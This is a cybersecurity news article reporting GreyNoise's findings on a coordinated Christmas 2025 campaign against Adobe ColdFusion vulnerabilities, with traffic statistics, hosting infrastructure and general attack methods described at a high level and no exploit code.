CYBERNEWSMEDIA Network:||
CYBERNEWSMEDIA
CYBERNEWSMEDIA

Cybersecurity News, Insights & Analysis

Latest
TrueConf Zero-Day Exploited in Asian Government Attacks
In Other News: ChatGPT Data Leak, Android Rootkit, Water Facility Hit by Ransomware
Critical ShareFile Flaws Lead to Unauthenticated RCE
Mobile Attack Surface Expands as Enterprises Lose Control
React2Shell Exploited in Large-Scale Credential Harvesting Campaign
AD · 970×250

Vulnerabilities

Adobe ColdFusion Servers Targeted in Coordinated Campaign

GreyNoise has observed thousands of requests targeting a dozen vulnerabilities in Adobe ColdFusion during the Christmas 2025 holiday. The post Adobe ColdFusion Servers Targeted in Coordinated Campaign appeared first on SecurityWeek.

Adobe vulnerabilities

A threat actor has been targeting roughly a dozen vulnerabilities in Adobe ColdFusion as part of a massive initial access campaign, GreyNoise warns.

During the Christmas 2025 holiday, the threat intelligence firm observed thousands of requests targeting ColdFusion servers globally, apparently part of a single, coordinated intrusion effort.

The requests mainly originated from Japan-based infrastructure (associated with CTG Server Limited), with two IP addresses accounting for most of the observed traffic.

GreyNoise observed approximately 6,000 requests targeting ColdFusion vulnerabilities that were publicly disclosed in 2023 and 2024, with the activity peaking on December 25.

“The campaign leveraged ProjectDiscovery Interactsh for out-of-band callback verification, with JNDI/LDAP injection as the primary attack vector. The deliberate timing during Christmas Day (68% of traffic) suggests intentional targeting during reduced security monitoring periods,” GreyNoise notes.

Most of the requests targeted servers in the US (4,044), Spain (753), India (128), and Canada, Chile, Germany, and Pakistan (100 each).

The two primary IP addresses involved in the Adobe ColdFusion exploitation were seen operating concurrently 41% of the time, sending requests at intervals of 1-5 seconds, to cycle through 11 distinct attack types per target.

GreyNoise’s investigation revealed that the ColdFusion attacks represent only a small fraction of the malicious activity associated with the two IP addresses.

Used in a massive exploitation campaign, likely operated by an initial access broker, the IPs have generated over 2.5 million requests targeting more than 700 security defects in dozens of security stacks, the threat intelligence firm says.

GreyNoise also notes that the ISP hosting the infrastructure was previously involved in malicious operations such as phishing and spam.

Operating AS152194, the hosting provider is registered in Hong Kong, controls over 200,000 IPv4 addresses, and likely operates with limited abuse enforcement, GreyNoise notes.

Related: Shai-Hulud Supply Chain Attack Led to $8.5 Million Trust Wallet Heist

Related: Fortinet Warns of New Attacks Exploiting Old Vulnerability

Related: Fresh MongoDB Vulnerability Exploited in Attacks

Related: Rising Tides: When Cybersecurity Becomes Personal – Inside the Work of an OSINT Investigator

Latest News

CYBERNEWSMEDIAPublisher